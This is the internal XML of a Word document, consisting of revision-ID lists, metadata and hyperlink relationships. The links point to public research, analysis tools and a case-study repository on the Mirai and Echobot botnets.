    <w:rsid w:val="006A1F82"/>
    <w:rsid w:val="006A6690"/>
    <w:rsid w:val="006A6C92"/>
    <w:rsid w:val="006B0A21"/>
    <w:rsid w:val="006B603C"/>
    <w:rsid w:val="006C05FE"/>
    <w:rsid w:val="006C3B97"/>
    <w:rsid w:val="006C460B"/>
    <w:rsid w:val="006C5ED7"/>
    <w:rsid w:val="006D18C9"/>
    <w:rsid w:val="006D3D74"/>
    <w:rsid w:val="006D75AA"/>
    <w:rsid w:val="006E077E"/>
    <w:rsid w:val="006E1DAF"/>
    <w:rsid w:val="006E2283"/>
    <w:rsid w:val="006E43ED"/>
    <w:rsid w:val="006E45BA"/>
    <w:rsid w:val="006E76B1"/>
    <w:rsid w:val="006E7DA7"/>
    <w:rsid w:val="006F2EED"/>
    <w:rsid w:val="006F476B"/>
    <w:rsid w:val="006F4E16"/>
    <w:rsid w:val="00702978"/>
    <w:rsid w:val="0070672C"/>
    <w:rsid w:val="007072C8"/>
    <w:rsid w:val="0070743D"/>
    <w:rsid w:val="007154EE"/>
    <w:rsid w:val="007155C3"/>
    <w:rsid w:val="0072273E"/>
    <w:rsid w:val="00725107"/>
    <w:rsid w:val="00725EDC"/>
    <w:rsid w:val="007261CB"/>
    <w:rsid w:val="00727EB8"/>
    <w:rsid w:val="00732B7D"/>
    <w:rsid w:val="00733052"/>
    <w:rsid w:val="007370BD"/>
    <w:rsid w:val="007400D3"/>
    <w:rsid w:val="0074392C"/>
    <w:rsid w:val="00744F37"/>
    <w:rsid w:val="00746680"/>
    <w:rsid w:val="007509DC"/>
    <w:rsid w:val="00751C3F"/>
    <w:rsid w:val="00751D7F"/>
    <w:rsid w:val="007572C3"/>
    <w:rsid w:val="00762276"/>
    <w:rsid w:val="00762C2D"/>
    <w:rsid w:val="00765C23"/>
    <w:rsid w:val="007701FB"/>
    <w:rsid w:val="00775E20"/>
    <w:rsid w:val="007822A9"/>
    <w:rsid w:val="0078423A"/>
    <w:rsid w:val="00785DE1"/>
    <w:rsid w:val="007912D8"/>
    <w:rsid w:val="00792512"/>
    <w:rsid w:val="00797EEA"/>
    <w:rsid w:val="007A4624"/>
    <w:rsid w:val="007A673C"/>
    <w:rsid w:val="007B3210"/>
    <w:rsid w:val="007B36B1"/>
    <w:rsid w:val="007B53D0"/>
    <w:rsid w:val="007B71F3"/>
    <w:rsid w:val="007C3AAC"/>
    <w:rsid w:val="007C4524"/>
    <w:rsid w:val="007C54BE"/>
    <w:rsid w:val="007D2283"/>
    <w:rsid w:val="007D39FE"/>
    <w:rsid w:val="007D45FD"/>
    <w:rsid w:val="007E0893"/>
    <w:rsid w:val="007F17E1"/>
    <w:rsid w:val="007F2A4A"/>
    <w:rsid w:val="007F4899"/>
    <w:rsid w:val="007F6A5E"/>
    <w:rsid w:val="007F73D6"/>
    <w:rsid w:val="007F7C3F"/>
    <w:rsid w:val="00800406"/>
    <w:rsid w:val="00803BD5"/>
    <w:rsid w:val="00806694"/>
    <w:rsid w:val="008104FD"/>
    <w:rsid w:val="008107D3"/>
    <w:rsid w:val="00810B67"/>
    <w:rsid w:val="00814D98"/>
    <w:rsid w:val="00816865"/>
    <w:rsid w:val="00816E5F"/>
    <w:rsid w:val="00820944"/>
    <w:rsid w:val="00820A1B"/>
    <w:rsid w:val="008234EA"/>
    <w:rsid w:val="00826463"/>
    <w:rsid w:val="00826A5C"/>
    <w:rsid w:val="008302D3"/>
    <w:rsid w:val="0083530C"/>
    <w:rsid w:val="0083541F"/>
    <w:rsid w:val="0083569A"/>
    <w:rsid w:val="00836A03"/>
    <w:rsid w:val="0084223F"/>
    <w:rsid w:val="008423EF"/>
    <w:rsid w:val="00852284"/>
    <w:rsid w:val="00854DC0"/>
    <w:rsid w:val="00854FC4"/>
    <w:rsid w:val="00860414"/>
    <w:rsid w:val="008611D0"/>
    <w:rsid w:val="0086428A"/>
    <w:rsid w:val="00873506"/>
    <w:rsid w:val="00873A5A"/>
    <w:rsid w:val="00876652"/>
    <w:rsid w:val="00876747"/>
    <w:rsid w:val="0087776C"/>
    <w:rsid w:val="00882017"/>
    <w:rsid w:val="00885E4E"/>
    <w:rsid w:val="00886145"/>
    <w:rsid w:val="00887D34"/>
    <w:rsid w:val="00892606"/>
    <w:rsid w:val="00892B2C"/>
    <w:rsid w:val="008938C8"/>
    <w:rsid w:val="00895947"/>
    <w:rsid w:val="00897E2B"/>
    <w:rsid w:val="008A05DB"/>
    <w:rsid w:val="008A0C3D"/>
    <w:rsid w:val="008A1D23"/>
    <w:rsid w:val="008A3249"/>
    <w:rsid w:val="008A4D15"/>
    <w:rsid w:val="008A63DA"/>
    <w:rsid w:val="008B1832"/>
    <w:rsid w:val="008B3FCD"/>
    <w:rsid w:val="008B4FD5"/>
    <w:rsid w:val="008B50AB"/>
    <w:rsid w:val="008B58A6"/>
    <w:rsid w:val="008B615F"/>
    <w:rsid w:val="008C1BFA"/>
    <w:rsid w:val="008C5476"/>
    <w:rsid w:val="008D0864"/>
    <w:rsid w:val="008E037E"/>
    <w:rsid w:val="008E1F9F"/>
    <w:rsid w:val="008E5462"/>
    <w:rsid w:val="008E575E"/>
    <w:rsid w:val="008F2C9E"/>
    <w:rsid w:val="008F3C04"/>
    <w:rsid w:val="009040EE"/>
    <w:rsid w:val="00912CA4"/>
    <w:rsid w:val="009138B6"/>
    <w:rsid w:val="009167B3"/>
    <w:rsid w:val="00917184"/>
    <w:rsid w:val="0092073F"/>
    <w:rsid w:val="00920CF0"/>
    <w:rsid w:val="0092278D"/>
    <w:rsid w:val="00924928"/>
    <w:rsid w:val="009255AB"/>
    <w:rsid w:val="00926993"/>
    <w:rsid w:val="00933A7C"/>
    <w:rsid w:val="0093428E"/>
    <w:rsid w:val="00940CF8"/>
    <w:rsid w:val="00940E54"/>
    <w:rsid w:val="0094235C"/>
    <w:rsid w:val="00946849"/>
    <w:rsid w:val="009472BC"/>
    <w:rsid w:val="00947CBE"/>
    <w:rsid w:val="00951FEB"/>
    <w:rsid w:val="0095425F"/>
    <w:rsid w:val="00957BD5"/>
    <w:rsid w:val="00960E94"/>
    <w:rsid w:val="00961D75"/>
    <w:rsid w:val="009625DE"/>
    <w:rsid w:val="0096763B"/>
    <w:rsid w:val="00967D81"/>
    <w:rsid w:val="0097163D"/>
    <w:rsid w:val="00971E8B"/>
    <w:rsid w:val="00972FBC"/>
    <w:rsid w:val="0097436C"/>
    <w:rsid w:val="00974897"/>
    <w:rsid w:val="00974947"/>
    <w:rsid w:val="009773D8"/>
    <w:rsid w:val="009805C9"/>
    <w:rsid w:val="00980A0F"/>
    <w:rsid w:val="00982B5A"/>
    <w:rsid w:val="00983078"/>
    <w:rsid w:val="0099153A"/>
    <w:rsid w:val="00991BE5"/>
    <w:rsid w:val="0099245B"/>
    <w:rsid w:val="009963B8"/>
    <w:rsid w:val="00996F84"/>
    <w:rsid w:val="009A69C1"/>
    <w:rsid w:val="009B3B4D"/>
    <w:rsid w:val="009B593A"/>
    <w:rsid w:val="009B727C"/>
    <w:rsid w:val="009C6698"/>
    <w:rsid w:val="009C7757"/>
    <w:rsid w:val="009D1235"/>
    <w:rsid w:val="009D1D02"/>
    <w:rsid w:val="009D563F"/>
    <w:rsid w:val="009E3DDE"/>
    <w:rsid w:val="009E585D"/>
    <w:rsid w:val="009F2125"/>
    <w:rsid w:val="00A067ED"/>
    <w:rsid w:val="00A10394"/>
    <w:rsid w:val="00A11554"/>
    <w:rsid w:val="00A12254"/>
    <w:rsid w:val="00A14BFF"/>
    <w:rsid w:val="00A2725B"/>
    <w:rsid w:val="00A3021D"/>
    <w:rsid w:val="00A342F7"/>
    <w:rsid w:val="00A36199"/>
    <w:rsid w:val="00A364C3"/>
    <w:rsid w:val="00A36FA5"/>
    <w:rsid w:val="00A4061E"/>
    <w:rsid w:val="00A43F7F"/>
    <w:rsid w:val="00A51EB2"/>
    <w:rsid w:val="00A52D37"/>
    <w:rsid w:val="00A53CB0"/>
    <w:rsid w:val="00A55EBF"/>
    <w:rsid w:val="00A563D4"/>
    <w:rsid w:val="00A578C9"/>
    <w:rsid w:val="00A612A6"/>
    <w:rsid w:val="00A64D06"/>
    <w:rsid w:val="00A6567C"/>
    <w:rsid w:val="00A702A8"/>
    <w:rsid w:val="00A75980"/>
    <w:rsid w:val="00A775AB"/>
    <w:rsid w:val="00A81938"/>
    <w:rsid w:val="00A83B85"/>
    <w:rsid w:val="00A83F07"/>
    <w:rsid w:val="00A846C8"/>
    <w:rsid w:val="00A867D6"/>
    <w:rsid w:val="00A9204E"/>
    <w:rsid w:val="00A9385C"/>
    <w:rsid w:val="00A96D14"/>
    <w:rsid w:val="00AB0294"/>
    <w:rsid w:val="00AB1DBA"/>
    <w:rsid w:val="00AB298A"/>
    <w:rsid w:val="00AB3D0D"/>
    <w:rsid w:val="00AB5CDD"/>
    <w:rsid w:val="00AC5A66"/>
    <w:rsid w:val="00AC6C9D"/>
    <w:rsid w:val="00AC7679"/>
    <w:rsid w:val="00AD5F2B"/>
    <w:rsid w:val="00AE0698"/>
    <w:rsid w:val="00AE5962"/>
    <w:rsid w:val="00AE7C3F"/>
    <w:rsid w:val="00AF3276"/>
    <w:rsid w:val="00AF6C2D"/>
    <w:rsid w:val="00B07B35"/>
    <w:rsid w:val="00B112E6"/>
    <w:rsid w:val="00B25C3A"/>
    <w:rsid w:val="00B26B6C"/>
    <w:rsid w:val="00B27BDC"/>
    <w:rsid w:val="00B34D1C"/>
    <w:rsid w:val="00B357D1"/>
    <w:rsid w:val="00B359B1"/>
    <w:rsid w:val="00B36C08"/>
    <w:rsid w:val="00B43432"/>
    <w:rsid w:val="00B479F3"/>
    <w:rsid w:val="00B52B0F"/>
    <w:rsid w:val="00B54FE6"/>
    <w:rsid w:val="00B57AE6"/>
    <w:rsid w:val="00B57BEB"/>
    <w:rsid w:val="00B64C2D"/>
    <w:rsid w:val="00B71000"/>
    <w:rsid w:val="00B71F94"/>
    <w:rsid w:val="00B73539"/>
    <w:rsid w:val="00B75BB6"/>
    <w:rsid w:val="00B80893"/>
    <w:rsid w:val="00B8413B"/>
    <w:rsid w:val="00B84EFB"/>
    <w:rsid w:val="00B912E7"/>
    <w:rsid w:val="00B93D00"/>
    <w:rsid w:val="00BA1C42"/>
    <w:rsid w:val="00BA2BA7"/>
    <w:rsid w:val="00BA5271"/>
    <w:rsid w:val="00BA5AA3"/>
    <w:rsid w:val="00BA717C"/>
    <w:rsid w:val="00BA73BE"/>
    <w:rsid w:val="00BB1E43"/>
    <w:rsid w:val="00BB2A52"/>
    <w:rsid w:val="00BB59EB"/>
    <w:rsid w:val="00BB7EBE"/>
    <w:rsid w:val="00BC006D"/>
    <w:rsid w:val="00BC25E9"/>
    <w:rsid w:val="00BC51D0"/>
    <w:rsid w:val="00BC5302"/>
    <w:rsid w:val="00BC6CDF"/>
    <w:rsid w:val="00BC7215"/>
    <w:rsid w:val="00BD1343"/>
    <w:rsid w:val="00BD1435"/>
    <w:rsid w:val="00BD416A"/>
    <w:rsid w:val="00BE0373"/>
    <w:rsid w:val="00BE6018"/>
    <w:rsid w:val="00BE7AC8"/>
    <w:rsid w:val="00BF6A60"/>
    <w:rsid w:val="00C03FCB"/>
    <w:rsid w:val="00C07574"/>
    <w:rsid w:val="00C10419"/>
    <w:rsid w:val="00C10501"/>
    <w:rsid w:val="00C133A2"/>
    <w:rsid w:val="00C14AA2"/>
    <w:rsid w:val="00C17004"/>
    <w:rsid w:val="00C31692"/>
    <w:rsid w:val="00C34C27"/>
    <w:rsid w:val="00C3693D"/>
    <w:rsid w:val="00C4220D"/>
    <w:rsid w:val="00C423F8"/>
    <w:rsid w:val="00C4486A"/>
    <w:rsid w:val="00C452A9"/>
    <w:rsid w:val="00C459F2"/>
    <w:rsid w:val="00C46E5C"/>
    <w:rsid w:val="00C5222F"/>
    <w:rsid w:val="00C629F8"/>
    <w:rsid w:val="00C64420"/>
    <w:rsid w:val="00C650FB"/>
    <w:rsid w:val="00C670D4"/>
    <w:rsid w:val="00C675C4"/>
    <w:rsid w:val="00C67888"/>
    <w:rsid w:val="00C70070"/>
    <w:rsid w:val="00C70821"/>
    <w:rsid w:val="00C72F16"/>
    <w:rsid w:val="00C75961"/>
    <w:rsid w:val="00C76127"/>
    <w:rsid w:val="00C76487"/>
    <w:rsid w:val="00C76C0D"/>
    <w:rsid w:val="00C80576"/>
    <w:rsid w:val="00C924B1"/>
    <w:rsid w:val="00C9250F"/>
    <w:rsid w:val="00C92F0E"/>
    <w:rsid w:val="00C934C4"/>
    <w:rsid w:val="00C94DDF"/>
    <w:rsid w:val="00C96B14"/>
    <w:rsid w:val="00C97199"/>
    <w:rsid w:val="00CA126F"/>
    <w:rsid w:val="00CA143A"/>
    <w:rsid w:val="00CA499A"/>
    <w:rsid w:val="00CB4CCB"/>
    <w:rsid w:val="00CC1B62"/>
    <w:rsid w:val="00CD4BEB"/>
    <w:rsid w:val="00CD53BD"/>
    <w:rsid w:val="00CD6114"/>
    <w:rsid w:val="00CE0000"/>
    <w:rsid w:val="00CE20B1"/>
    <w:rsid w:val="00CE2C3E"/>
    <w:rsid w:val="00CE4ABF"/>
    <w:rsid w:val="00CF0F7A"/>
    <w:rsid w:val="00CF1288"/>
    <w:rsid w:val="00CF1A3F"/>
    <w:rsid w:val="00CF4933"/>
    <w:rsid w:val="00CF6734"/>
    <w:rsid w:val="00CF67B2"/>
    <w:rsid w:val="00CF798C"/>
    <w:rsid w:val="00D0165D"/>
    <w:rsid w:val="00D03475"/>
    <w:rsid w:val="00D03FD1"/>
    <w:rsid w:val="00D10654"/>
    <w:rsid w:val="00D10983"/>
    <w:rsid w:val="00D16604"/>
    <w:rsid w:val="00D17A6F"/>
    <w:rsid w:val="00D20D25"/>
    <w:rsid w:val="00D25CA2"/>
    <w:rsid w:val="00D31358"/>
    <w:rsid w:val="00D37481"/>
    <w:rsid w:val="00D37A0B"/>
    <w:rsid w:val="00D43116"/>
    <w:rsid w:val="00D434BD"/>
    <w:rsid w:val="00D50208"/>
    <w:rsid w:val="00D51594"/>
    <w:rsid w:val="00D518D5"/>
    <w:rsid w:val="00D52811"/>
    <w:rsid w:val="00D52FDE"/>
    <w:rsid w:val="00D60A17"/>
    <w:rsid w:val="00D6742F"/>
    <w:rsid w:val="00D71622"/>
    <w:rsid w:val="00D739E1"/>
    <w:rsid w:val="00D76292"/>
    <w:rsid w:val="00D800CC"/>
    <w:rsid w:val="00D81AA7"/>
    <w:rsid w:val="00D82790"/>
    <w:rsid w:val="00D86113"/>
    <w:rsid w:val="00D87E73"/>
    <w:rsid w:val="00D91614"/>
    <w:rsid w:val="00D916DE"/>
    <w:rsid w:val="00D9378B"/>
    <w:rsid w:val="00DA0CB0"/>
    <w:rsid w:val="00DA32D4"/>
    <w:rsid w:val="00DB2C7F"/>
    <w:rsid w:val="00DB54B0"/>
    <w:rsid w:val="00DC0A97"/>
    <w:rsid w:val="00DC1670"/>
    <w:rsid w:val="00DC3CA9"/>
    <w:rsid w:val="00DC3D52"/>
    <w:rsid w:val="00DC6B3C"/>
    <w:rsid w:val="00DC6F5A"/>
    <w:rsid w:val="00DD3D12"/>
    <w:rsid w:val="00DD4141"/>
    <w:rsid w:val="00DE0F5D"/>
    <w:rsid w:val="00DE2AF0"/>
    <w:rsid w:val="00DE3DF6"/>
    <w:rsid w:val="00DE4CE7"/>
    <w:rsid w:val="00DE54CB"/>
    <w:rsid w:val="00DE5B83"/>
    <w:rsid w:val="00DE7D3F"/>
    <w:rsid w:val="00DF2386"/>
    <w:rsid w:val="00DF25AE"/>
    <w:rsid w:val="00DF2885"/>
    <w:rsid w:val="00DF2A99"/>
    <w:rsid w:val="00DF2DD6"/>
    <w:rsid w:val="00DF4A82"/>
    <w:rsid w:val="00DF6CDC"/>
    <w:rsid w:val="00DF7C47"/>
    <w:rsid w:val="00E00714"/>
    <w:rsid w:val="00E012E5"/>
    <w:rsid w:val="00E02C5E"/>
    <w:rsid w:val="00E03D63"/>
    <w:rsid w:val="00E103F3"/>
    <w:rsid w:val="00E12FE5"/>
    <w:rsid w:val="00E1417D"/>
    <w:rsid w:val="00E21639"/>
    <w:rsid w:val="00E236CE"/>
    <w:rsid w:val="00E237AE"/>
    <w:rsid w:val="00E3057A"/>
    <w:rsid w:val="00E33C1A"/>
    <w:rsid w:val="00E35D48"/>
    <w:rsid w:val="00E36F88"/>
    <w:rsid w:val="00E442A6"/>
    <w:rsid w:val="00E45908"/>
    <w:rsid w:val="00E50E05"/>
    <w:rsid w:val="00E53C6D"/>
    <w:rsid w:val="00E56A73"/>
    <w:rsid w:val="00E612CB"/>
    <w:rsid w:val="00E62929"/>
    <w:rsid w:val="00E649CD"/>
    <w:rsid w:val="00E65E5F"/>
    <w:rsid w:val="00E67FA4"/>
    <w:rsid w:val="00E70AFD"/>
    <w:rsid w:val="00E71B5E"/>
    <w:rsid w:val="00E72C0B"/>
    <w:rsid w:val="00E82790"/>
    <w:rsid w:val="00E83D5B"/>
    <w:rsid w:val="00E85EEB"/>
    <w:rsid w:val="00E90805"/>
    <w:rsid w:val="00E950DF"/>
    <w:rsid w:val="00E96CE3"/>
    <w:rsid w:val="00EA5644"/>
    <w:rsid w:val="00EA585F"/>
    <w:rsid w:val="00EA63EB"/>
    <w:rsid w:val="00EA6816"/>
    <w:rsid w:val="00EA70F1"/>
    <w:rsid w:val="00EB032F"/>
    <w:rsid w:val="00EB0794"/>
    <w:rsid w:val="00EB0D68"/>
    <w:rsid w:val="00EB14E0"/>
    <w:rsid w:val="00EB3DAD"/>
    <w:rsid w:val="00EB4644"/>
    <w:rsid w:val="00EB49A5"/>
    <w:rsid w:val="00EB49BF"/>
    <w:rsid w:val="00EB6701"/>
    <w:rsid w:val="00EC2F7B"/>
    <w:rsid w:val="00EC3A31"/>
    <w:rsid w:val="00EC40AE"/>
    <w:rsid w:val="00EC48A0"/>
    <w:rsid w:val="00EC706E"/>
    <w:rsid w:val="00EC78F1"/>
    <w:rsid w:val="00EC7B5B"/>
    <w:rsid w:val="00ED27EA"/>
    <w:rsid w:val="00EE4124"/>
    <w:rsid w:val="00EE56BF"/>
    <w:rsid w:val="00EE624D"/>
    <w:rsid w:val="00EE6C41"/>
    <w:rsid w:val="00EF368C"/>
    <w:rsid w:val="00EF3BB8"/>
    <w:rsid w:val="00EF7106"/>
    <w:rsid w:val="00F00DA1"/>
    <w:rsid w:val="00F05DF6"/>
    <w:rsid w:val="00F10D6C"/>
    <w:rsid w:val="00F13929"/>
    <w:rsid w:val="00F15E39"/>
    <w:rsid w:val="00F165C9"/>
    <w:rsid w:val="00F2286D"/>
    <w:rsid w:val="00F239A9"/>
    <w:rsid w:val="00F24BB3"/>
    <w:rsid w:val="00F25E0D"/>
    <w:rsid w:val="00F406FC"/>
    <w:rsid w:val="00F438D8"/>
    <w:rsid w:val="00F4532C"/>
    <w:rsid w:val="00F45B2D"/>
    <w:rsid w:val="00F45F6A"/>
    <w:rsid w:val="00F518E0"/>
    <w:rsid w:val="00F52D18"/>
    <w:rsid w:val="00F5305F"/>
    <w:rsid w:val="00F54C3C"/>
    <w:rsid w:val="00F55AC3"/>
    <w:rsid w:val="00F6266D"/>
    <w:rsid w:val="00F65DD3"/>
    <w:rsid w:val="00F66BFE"/>
    <w:rsid w:val="00F679D4"/>
    <w:rsid w:val="00F71712"/>
    <w:rsid w:val="00F71DCF"/>
    <w:rsid w:val="00F7302C"/>
    <w:rsid w:val="00F87F14"/>
    <w:rsid w:val="00F91234"/>
    <w:rsid w:val="00F96D93"/>
    <w:rsid w:val="00F97A59"/>
    <w:rsid w:val="00FA1067"/>
    <w:rsid w:val="00FA334C"/>
    <w:rsid w:val="00FA6BFC"/>
    <w:rsid w:val="00FA749B"/>
    <w:rsid w:val="00FA7604"/>
    <w:rsid w:val="00FB46DF"/>
    <w:rsid w:val="00FB5097"/>
    <w:rsid w:val="00FC35E2"/>
    <w:rsid w:val="00FD1287"/>
    <w:rsid w:val="00FD7B86"/>
    <w:rsid w:val="00FE1794"/>
    <w:rsid w:val="00FE2E27"/>
    <w:rsid w:val="00FE5502"/>
    <w:rsid w:val="00FE63C6"/>
    <w:rsid w:val="00FF1ADC"/>
    <w:rsid w:val="00FF383D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3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C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yperlink" Target="http://www.w3.com" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities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zeropointdynamics/zelos" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://badthings.info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schemas.xmlsoap.org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www.gnu.org/software/binutils/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.radware.com/getattachment/402db7f3-0467-4fa3-bb9a-ae88b728e91b/MiraiHandbookEbookFinal_04.pdf.aspx" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitr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hyperlink" Target="http://vmware.com" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/alrawi/badthings-tools/tree/master/dynamic_analysis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hidra-sre.org/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/linux-kernel-watchdog-explain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target.com" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Adumbrati0n/Mirai-Case-Study/blob/main/IPHostBruteForce.txt" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/raw/JWKpuKid" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pan-unit42/iocs/blob/master/mirai/ECHOBOT_28thOct2019.m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bea.com" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://strace.io/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.subexsecure.com/pdf/malware-reports/June-2020/Linux_Mirai-Backdoor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bleepingcomputer.com/news/security/new-echobot-variant-exploits-77-remote-code-execution-flaw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16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Office365</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-18T09:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04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